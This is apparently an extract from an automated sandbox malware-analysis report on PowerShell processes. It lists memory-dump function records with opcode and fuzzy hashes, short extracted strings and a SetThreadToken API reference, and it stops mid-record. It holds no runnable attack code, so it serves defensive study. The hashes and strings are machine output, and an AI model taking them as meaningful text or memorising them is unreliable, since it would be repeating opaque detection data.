Source File: 00000009.00000002.2185731333.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4620000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46dc90f09d0083eefdef715cd874cbff976cec867aceb8899c090666524b1b8c
Instruction ID: 8dcf02d00d0ed74666158b49417a136bcf23000a4ceceffb68e5a1a2ef9579fc
Opcode Fuzzy Hash: 46dc90f09d0083eefdef715cd874cbff976cec867aceb8899c090666524b1b8c
Instruction Fuzzy Hash: E9E0C25270293237165471B94F502BBAACE8FC52D9704423ED904D3301FE50EC068BE5

Function 04629168 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2185731333.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4620000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c19c4c48351143013053de22cf0b45b0f2e0beff8f6e428c07f2856bf9d4a132
Instruction ID: 596dfd65775a57810e01041dfb49ee398cc6c623ecdc7bb4d067fdbfa306d219
Opcode Fuzzy Hash: c19c4c48351143013053de22cf0b45b0f2e0beff8f6e428c07f2856bf9d4a132
Instruction Fuzzy Hash: 2CF06D70A003145BD3609F79D89C79BBBE9FB44310F40446DD50ED7340DB396882CB90

Function 04628978 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2185731333.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4620000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89bb4f049adbcb1f6bd7c0a270a5a380061f7e83de31957f3fd49346f91a715d
Instruction ID: a31b76ffa22818437cb2060aa859c82aa9b8b6c8e9d47b099f83a26a12975391
Opcode Fuzzy Hash: 89bb4f049adbcb1f6bd7c0a270a5a380061f7e83de31957f3fd49346f91a715d
Instruction Fuzzy Hash: FFE0DF3130462057DB183774AC0C6AE7A9ABBC4729F05002ED60A87342CF39280387DA

Function 04629550 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2185731333.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4620000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b7b691b5efd534004070a8a1592290e009864522eb42ea199c143d44980768c
Instruction ID: 01cad081e13eb8213d04093af0a88670cb67b93ecf7bd1b36079484fb0ff5af4
Opcode Fuzzy Hash: 3b7b691b5efd534004070a8a1592290e009864522eb42ea199c143d44980768c
Instruction Fuzzy Hash: B8D05E5271293237165871BA9F007BBA5CE8FD46E9B05823EDA09E7341FE40EC0647F5

Function 0462DCE8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2185731333.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4620000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction ID: 66ae9d48b308cd2283b0fe6a95ae6a436d4568e4b2ac5d3ca8faa943ed903930
Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction Fuzzy Hash: 6EE08631B10414A7CB489969D4104EDF7AADBCC220F14847BD90AA7340EA3269168BE1

Function 0462DC98 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2185731333.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4620000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bcb056b745a4ef31cbf8335b664b3872f94c4128ec75eba6a575ab3cdd327ce
Instruction ID: c60624e71b94157b7f074e4dcbc5f95586120859abd48e1e0838fd1c36fe5a78
Opcode Fuzzy Hash: 5bcb056b745a4ef31cbf8335b664b3872f94c4128ec75eba6a575ab3cdd327ce
Instruction Fuzzy Hash: 8DE08C31740A24178216AA2EA92095FB6DEEFC4661324442EE1098B340EE68E8068BD5

Function 04628739 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2185731333.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4620000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd177a2b4d1c6251451d2a664d2528c7926746cf69853535be9ba26319d8374d
Instruction ID: 61e18f9f7285aac2e1aaf4b98dfb89171c1d4dc1c097ea56a4d70a8cffb43d23
Opcode Fuzzy Hash: bd177a2b4d1c6251451d2a664d2528c7926746cf69853535be9ba26319d8374d
Instruction Fuzzy Hash: D7E01A3080424E9BDB59EBB4E85A8AFBF74FF05301F4101ADD94282182EB356657CF80

Function 04628800 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2185731333.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4620000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4234df7a2bf617bcc4c053f608c78409d9a3e6026727da94a1c36e8424c0a66e
Instruction ID: aefe5a8be0a16ec475dcdb92607b5df83f023848cc328a6f6f0edd071b5a6baf
Opcode Fuzzy Hash: 4234df7a2bf617bcc4c053f608c78409d9a3e6026727da94a1c36e8424c0a66e
Instruction Fuzzy Hash: 7AE0DF34A0920B8BC758EF78E8868AABFF9BB05300F004069DD44C3341EB31A852DFC1

Function 0462F460 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2185731333.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4620000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 967bf1c6b3a15f88f9d87759bfa741d303412754a18d5c8d8f315fffbb629b18
Instruction ID: 6e36b93533429b42db1f8cebc7bf1a43e281a5e629273ffffcacd327aa712622
Opcode Fuzzy Hash: 967bf1c6b3a15f88f9d87759bfa741d303412754a18d5c8d8f315fffbb629b18
Instruction Fuzzy Hash: E8E01270E442455E8B84DF78C5805AAFFF0DF59204B1485AED949E6215E3718912DF91

Function 0462F470 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2185731333.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4620000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction ID: af929fa31ed77dd0a87c81b32ba4e9e021745573483679befd4033ef6fe1171d
Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction Fuzzy Hash: 46D067B0D04619AF8784EFADC94156EFBF4EB48200F6085AA8919E7301F7729A12DFD1

Function 04628748 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2185731333.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4620000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d4339097571a829eceaf78d98b892ae1ef6069bda5e196d43a52364d9ce9a53
Instruction ID: 4f1c5db95e64e7b1dda1cd40dca65a50481bbfeec61dd4dca64e7612efb95ff0
Opcode Fuzzy Hash: 7d4339097571a829eceaf78d98b892ae1ef6069bda5e196d43a52364d9ce9a53
Instruction Fuzzy Hash: F9D0173080420D8BCB58ABA4EC1B4BEBB38FA00301F41026DD90752191EB362A4BCEC0

Function 04628810 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2185731333.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4620000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a6910e00358a6e891ceca0278d6a69d94f87dbe712ee81206ee89d821c18f42
Instruction ID: eba63ce58b0cbe1155965c786774d47f46e0a24de898587e9a7f70c71ef73c1a
Opcode Fuzzy Hash: 1a6910e00358a6e891ceca0278d6a69d94f87dbe712ee81206ee89d821c18f42
Instruction Fuzzy Hash: DBD01734E0820E9BCB58EFA8E84686EBBB9BB44300F004169D90993385EA316C02CFC1

Function 04627932 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2185731333.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4620000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: babd89a634f732d8618de3f3d47bf25a884f1843430c724e374976338933af51
Instruction ID: 34c52944a1c640840030e3684ec7806badabfafacaa67b21711f8482a09a97bd
Opcode Fuzzy Hash: babd89a634f732d8618de3f3d47bf25a884f1843430c724e374976338933af51
Instruction Fuzzy Hash: DBD0A770049388AFCB16073888548843F31EA4311534100CED48A8A1A3C521444FCF15

Function 04627EA0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2185731333.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4620000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9627bdc282be3e7840d9a56659a6d24f5175fce96005452089bfa6647d698348
Instruction ID: 6c1e97a3df22d5c368bb8ad1dda76efac36aae3446b5e0af697f00246177b31a
Opcode Fuzzy Hash: 9627bdc282be3e7840d9a56659a6d24f5175fce96005452089bfa6647d698348
Instruction Fuzzy Hash: ECC02B81C683881FEF02C23C0CA120C3F72454310138701C2C880DB066EC14CC43CB21

Function 04627940 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2185731333.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4620000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d78610a046d3d7825fc81270d0aca79dd5d5e49e875c3f4b7ff5ae77a8abca0d
Instruction ID: cc393b477c964bb946eb79c4cdb5355b5912fb008b6b1ea29c635b3343d826b4
Opcode Fuzzy Hash: d78610a046d3d7825fc81270d0aca79dd5d5e49e875c3f4b7ff5ae77a8abca0d
Instruction Fuzzy Hash: 78B09230045708CFC2586F79A4048147729FB4622978004ECE90F0A6928E36E889CA49

Non-executed Functions

Function 07491BE0 Relevance: 20.4, Strings: 16, Instructions: 415COMMON

Download Yara Rule

Strings

84Ul, xrefs: 07491F6C
84Ul, xrefs: 07491F76
4']q, xrefs: 07491F89
JXl, xrefs: 074920CE
rWl, xrefs: 07491C5D
JXl, xrefs: 07492017
JXl, xrefs: 07491FA1
rWl, xrefs: 07491C53
4']q, xrefs: 07491F95
JXl, xrefs: 0749200B
tP]q, xrefs: 07491FDF
$cJk, xrefs: 074920B4
tP]q, xrefs: 07491FEB
4']q, xrefs: 07491C92
JXl, xrefs: 074920C2
4']q, xrefs: 07491C86

Memory Dump Source

Source File: 00000009.00000002.2212395010.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7490000_powershell.jbxd

Similarity

API ID:
String ID: $cJk$4']q$4']q$4']q$4']q$84Ul$84Ul$tP]q$tP]q$JXl$JXl$JXl$JXl$JXl$rWl$rWl
API String ID: 0-1556771180
Opcode ID: 111d90f5c6634e448e357c22df06efd6a75072af010f1e3852948cd56d6d41fb
Instruction ID: 377cd737a1b2f4bcd9cb1d42ad51860d5f3a4a415a51054230f836a2ff0f8707
Opcode Fuzzy Hash: 111d90f5c6634e448e357c22df06efd6a75072af010f1e3852948cd56d6d41fb
Instruction Fuzzy Hash: FBD123B1B0420ADFCF258A6898106E7BFE6EF82310F1885BBC9558B355DB31D846C7A1

Function 07493928 Relevance: 12.8, Strings: 10, Instructions: 325COMMON

Download Yara Rule

Strings

tP]q, xrefs: 074939A5
$]q, xrefs: 0749393A
$]q, xrefs: 07493C0E
$]q, xrefs: 0749396C
Ml, xrefs: 07493A1D
4']q, xrefs: 07493B29
tP]q, xrefs: 074939B1
Ml, xrefs: 07493A0F
$]q, xrefs: 07493960
4']q, xrefs: 07493B35

Memory Dump Source

Source File: 00000009.00000002.2212395010.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7490000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q$Ml$Ml
API String ID: 0-3507995532
Opcode ID: a0473189f16f3077e8039e3248b5057cbaa800f383342b1539280e9184b2cb02
Instruction ID: 278df253218b84e3b43353a551190d8ef15bb4409d4a072900638a064156c717
Opcode Fuzzy Hash: a0473189f16f3077e8039e3248b5057cbaa800f383342b1539280e9184b2cb02
Instruction Fuzzy Hash: 10A114B23042559FCB259E688851BA7BFE6AF87610F1888BBD445CB392CB35CC46C761

Function 07494638 Relevance: 10.3, Strings: 8, Instructions: 261COMMON

Download Yara Rule

Strings

4']q, xrefs: 07494719
DUGk, xrefs: 07494895
4']q, xrefs: 074948D5
TGk, xrefs: 074946E5
XYWl, xrefs: 074946F3
4']q, xrefs: 07494725
4']q, xrefs: 074948C9
XYWl, xrefs: 074946FF

Memory Dump Source

Source File: 00000009.00000002.2212395010.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7490000_powershell.jbxd

Similarity

API ID:
String ID: TGk$4']q$4']q$4']q$4']q$DUGk$XYWl$XYWl
API String ID: 0-952053493
Opcode ID: dd75e8d2d8eeef09eb0fd51cd5a4b303bd163145e4e9a7615d070e83384770d8
Instruction ID: 759be7709cbe5a28e90cbfe7922e530c7402be70c996803ceb2db53bd61b8df0
Opcode Fuzzy Hash: dd75e8d2d8eeef09eb0fd51cd5a4b303bd163145e4e9a7615d070e83384770d8
Instruction Fuzzy Hash: 9F81F2B5B042998FCF24CA6CD9546EBBFE6AFC6221B1484BBC5058B355DA31CC43C761

Function 07493678 Relevance: 10.2, Strings: 8, Instructions: 194COMMON

Download Yara Rule

Strings

4']q, xrefs: 07493722
$]q, xrefs: 074937FF
Ml, xrefs: 0749387B
Ml, xrefs: 0749386D
$]q, xrefs: 0749382A
}, xrefs: 0749380E
4']q, xrefs: 0749372E
$]q, xrefs: 07493836

Memory Dump Source

Source File: 00000009.00000002.2212395010.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7490000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$}$$]q$$]q$$]q$Ml$Ml
API String ID: 0-756251553
Opcode ID: ccfbb960837add50a21575ba2c409ad82c64089f0761d039cc33aabd78307d1d
Instruction ID: da03608f5f659acfa9db91a1a59c5f96a4929597311879591bb77ff03723e3f7
Opcode Fuzzy Hash: ccfbb960837add50a21575ba2c409ad82c64089f0761d039cc33aabd78307d1d
Instruction Fuzzy Hash: 265103B17042469FDF259E6988106E7BFE6AFC3620F2488BBD445CB352DB35C846C7A1

Function 04624CC2 Relevance: 7.7, Strings: 6, Instructions: 161COMMON

Download Yara Rule

Strings

Hn^, xrefs: 04624CD2
Hn^, xrefs: 04624D92
Hn^, xrefs: 04624CC2
Hn^, xrefs: 04624DE2
Hn^, xrefs: 04624D32
Hn^, xrefs: 04624CE2

Memory Dump Source

Source File: 00000009.00000002.2185731333.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4620000_powershell.jbxd

Similarity

API ID:
String ID: Hn^$Hn^$Hn^$Hn^$Hn^$Hn^
API String ID: 0-2654090713
Opcode ID: 0685879f0bcbfdaa6f07aba889e04c99c3a250c84e43b66f553762d7e5579e14
Instruction ID: e43903adc63ee64b1555785f5616912094a202e14c03d357350e7bd6af448fbf
Opcode Fuzzy Hash: 0685879f0bcbfdaa6f07aba889e04c99c3a250c84e43b66f553762d7e5579e14
Instruction Fuzzy Hash: 9651296254E3D01FC7079B3C98B48867FB4AE9725870A41EBC1C4CF1B3D958985EC7A6

Function 04627A21 Relevance: 6.5, Strings: 5, Instructions: 243COMMON

Download Yara Rule

Strings

`^q, xrefs: 04627BA2
`^q, xrefs: 04627CC2
`^q, xrefs: 04627C44
tMWl, xrefs: 04627AD4
`^q, xrefs: 04627B23

Memory Dump Source

Source File: 00000009.00000002.2185731333.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4620000_powershell.jbxd

Similarity

API ID:
String ID: tMWl$`^q$`^q$`^q$`^q
API String ID: 0-643008544
Opcode ID: dcbf97a75614926fad0b4866496dd047bc3aa589ac2c2d6a4b588769ff523d09
Instruction ID: 6e9b4a667b4bc78fb55ec5fa1ae6823c3a0c57878515caf4cb7e4973461344d0
Opcode Fuzzy Hash: dcbf97a75614926fad0b4866496dd047bc3aa589ac2c2d6a4b588769ff523d09
Instruction Fuzzy Hash: 3BB1D974E006199FCB55DFA9D990A9DFBF6FF48300F14862AD819AB314EB34A905CF90

Function 04627A30 Relevance: 6.5, Strings: 5, Instructions: 234COMMON

Download Yara Rule

Strings

`^q, xrefs: 04627BA2
`^q, xrefs: 04627CC2
`^q, xrefs: 04627C44
tMWl, xrefs: 04627AD4
`^q, xrefs: 04627B23

Memory Dump Source

Source File: 00000009.00000002.2185731333.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4620000_powershell.jbxd

Similarity

API ID:
String ID: tMWl$`^q$`^q$`^q$`^q
API String ID: 0-643008544
Opcode ID: f5416808c09e8a6c553cf62ef527c130f2cc08a1788028fe0128e58a8f8b5ab5
Instruction ID: 2b4d21abcf4b2e45a986581d9f3cd680eb3e1ec49498b163bdcfc0b81f34c728
Opcode Fuzzy Hash: f5416808c09e8a6c553cf62ef527c130f2cc08a1788028fe0128e58a8f8b5ab5
Instruction Fuzzy Hash: 38B1B874E006199FDB54DFA9D990A9DFBF6FF48300F14862AD819AB314EB34A905CF90

Function 07495798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$]q, xrefs: 074957AA
$]q, xrefs: 074957F4
$]q, xrefs: 07495800
$]q, xrefs: 074957C6

Memory Dump Source

Source File: 00000009.00000002.2212395010.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7490000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 15a8d650b9182f4df6560f75209f77c1ad41be9e68541a141bba468338aac0fb
Instruction ID: 7f73c03826705e8e74168bd1cf5f00a4c17ffcae9c09ee8d962ce0d90291de79
Opcode Fuzzy Hash: 15a8d650b9182f4df6560f75209f77c1ad41be9e68541a141bba468338aac0fb
Instruction Fuzzy Hash: 0C2128B13102159BDF39953A9840BA7FFD69BC1711F34883B99058B3C1DD35C9628361

Function 07490308 Relevance: 5.1, Strings: 4, Instructions: 52COMMON

Download Yara Rule

Strings

$]q, xrefs: 07490352
4']q, xrefs: 07490373
$]q, xrefs: 0749035E
4']q, xrefs: 0749037F

Memory Dump Source

Source File: 00000009.00000002.2212395010.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7490000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q
API String ID: 0-978391646
Opcode ID: 1d18e7b8f83043eb803944a21253d73a815e4a075dfd16adb0337a64c7acb018
Instruction ID: 876b83481dfe078b299a9905d7624108d542b3ffd2fc7acae2d4ffb8d27a0a02
Opcode Fuzzy Hash: 1d18e7b8f83043eb803944a21253d73a815e4a075dfd16adb0337a64c7acb018
Instruction Fuzzy Hash: 2001F72174D3C64FCB3B163818211956FF28F8395071A05E7C480DF3A7C9154C0A83A7

Function 07492107 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

$]q, xrefs: 07492166
$]q, xrefs: 07492172
JXl, xrefs: 0749214A
JXl, xrefs: 07492156

Memory Dump Source

Source File: 00000009.00000002.2212395010.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7490000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$JXl$JXl
API String ID: 0-219706370
Opcode ID: 0a7b83334ec2f4f7c3250f323b7143a00d6387cd62f9abfd7e0c781bc3a02fe5
Instruction ID: c400bb015645494e938bbdf402e0c00679a9da8109ac513422f787495ccc26fd
Opcode Fuzzy Hash: 0a7b83334ec2f4f7c3250f323b7143a00d6387cd62f9abfd7e0c781bc3a02fe5
Instruction Fuzzy Hash: 6601287121E3D19FC71706285C224936FBAAFC391071985E3C5C0DF267C5684C0AC366

Analysis Process: powershell.exePID: 5388, Parent PID: 6592COMMON

Execution Graph

Execution Coverage:	9.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	30
Total number of Limit Nodes:	2

Executed Functions

Function 04DCB470 Relevance: .3, Instructions: 261
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.2242555324.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4dc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0608c48850f81f8c77ef312ffe683cf3690a56118df8cd021d7a6d5022924769
Instruction ID: e6fa5d0e47462df76e954c516ba229b83981f8350a7bb79903871a48978697ae
Opcode Fuzzy Hash: 0608c48850f81f8c77ef312ffe683cf3690a56118df8cd021d7a6d5022924769
Instruction Fuzzy Hash: 62917374B006155FDB19EFB488106AE77B2EFC4A04B04851DD68AAF344DF39A907CBD6

Function 04DCB490 Relevance: .3, Instructions: 252
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.2242555324.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4dc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9100beecec82e7dbff1f4e971e4edfa4bc692fcad7971cbfe6255c90d7cdf354
Instruction ID: 472079d20b7a2522fb90d5f02de7241211fd7a0a875d3dabaf6fa6741a59b722
Opcode Fuzzy Hash: 9100beecec82e7dbff1f4e971e4edfa4bc692fcad7971cbfe6255c90d7cdf354
Instruction Fuzzy Hash: 94914378B006155BDB19EFB588106AEB7B2EFC4A04B00C51DD64AAF344DF39AD078BD6

Function 079D24D8 Relevance: 10.5, Strings: 8, Instructions: 499
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

rWl, xrefs: 079D2559
JXl, xrefs: 079D259E
|,!k, xrefs: 079D25DB
4']q, xrefs: 079D2619
4']q, xrefs: 079D260D
rWl, xrefs: 079D254F
JXl, xrefs: 079D25F6
JXl, xrefs: 079D25EA

Memory Dump Source

Source File: 0000000C.00000002.2281188120.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79d0000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$|,!k$JXl$JXl$JXl$rWl$rWl
API String ID: 0-683603943
Opcode ID: dbdf3040800303bcc44391b6bef275e3e21d63d0428c04c022517a4ef04c751b
Instruction ID: 0488dac4403291e883711c84cf2536e217cb97454e59dc8642b788092ddaa287
Opcode Fuzzy Hash: dbdf3040800303bcc44391b6bef275e3e21d63d0428c04c022517a4ef04c751b
Instruction Fuzzy Hash: 2AF136B1B00206CFCB258FA8C9506AABBEAFF85319F10C47AE905CB251DB75DD45C7A1

Function 08E46A58 Relevance: 1.6, APIs: 1, Instructions: 119
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadToken.KERNELBASE(?,?), ref: 08E46B7A

Memory Dump Source

Source File: 0000000C.00000002.2287266304.0000000008E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_8e40000_powershell.jbxd

Similarity

API ID: ThreadToken
String ID:
API String ID: 3254676861-0
Opcode ID: f97369c468fcfbf3d54ebbfc1f7c8ce5b4ef5f26023ea77990623ba0fc32c124
Instruction ID: 6e87f725c4f313c35a7ebf31774aaf2f2a634ff31d11eee4487a6f342b600201
Opcode Fuzzy Hash: f97369c468fcfbf3d54ebbfc1f7c8ce5b4ef5f26023ea77990623ba0fc32c124
Instruction Fuzzy Hash: 354145B5A006098FCB10DF9DD584AAEFBF5FF49310F248569D918A7321C775E882CBA0

Function 08E43B08 Relevance: 1.6, APIs: 1, Instructions: 51
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadToken.KERNELBASE(?,?), ref: 08E46B7A

Memory Dump Source

Source File: 0000000C.00000002.2287266304.0000000008E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_8e40000_powershell.jbxd

Similarity

API ID: ThreadToken
String ID:
API String ID: 3254676861-0
Opcode ID: 9537615624cc43342f3820f3c61c6bbef2af92f7989b188c3e0b67c9bec8c19e
Instruction ID: aae8658f72723563c418d8072e93402e7ecaae8583bb90c7ffe8041efb53cbdd
Opcode Fuzzy Hash: 9537615624cc43342f3820f3c61c6bbef2af92f7989b188c3e0b67c9bec8c19e
Instruction Fuzzy Hash: CF1113B19006488FDB10DF9AD948BAEFBF8EB89320F148459D519A7220C778A945CFA5

Function 04DCE5B9 Relevance: 1.4, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

JXl, xrefs: 04DCE6EA

Memory Dump Source

Source File: 0000000C.00000002.2242555324.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4dc0000_powershell.jbxd

Similarity

API ID:
String ID: JXl
API String ID: 0-1614082895
Opcode ID: b0c24786e49149290ba3c2b4bc8baa13c1e9f6588611c433b4c9e1520d64c136
Instruction ID: 78cf5640c15aba1136a7ba10de87e12d80887fcf2280750a963c2dfb298016f5
Opcode Fuzzy Hash: b0c24786e49149290ba3c2b4bc8baa13c1e9f6588611c433b4c9e1520d64c136
Instruction Fuzzy Hash: 3241BD30A042059FCB16DFB9D950A9EBFF1EF89304F0085ADD406AB395DB34AC05CB90

Function 04DC6FC8 Relevance: 1.4, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(aq, xrefs: 04DC70ED

Memory Dump Source

Source File: 0000000C.00000002.2242555324.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4dc0000_powershell.jbxd

Similarity

API ID:
String ID: (aq
API String ID: 0-600464949
Opcode ID: 3d69da63fdd4f5b7686d15f57f76f35aa04cff288b9c0e6ca94f00380e6819d3
Instruction ID: 45ea6756bb6a0d7612dc17c1b2ada5492a98f336ab6bf8e22f91c4110f344b94
Opcode Fuzzy Hash: 3d69da63fdd4f5b7686d15f57f76f35aa04cff288b9c0e6ca94f00380e6819d3
Instruction Fuzzy Hash: 9C411834B042068FDB14DFA8C558AAEBBF2EF8D711F144099E442AB395DA35ED02DF61

Function 04DCE610 Relevance: 1.4, Strings: 1, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

JXl, xrefs: 04DCE6EA

Memory Dump Source

Source File: 0000000C.00000002.2242555324.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4dc0000_powershell.jbxd

Similarity

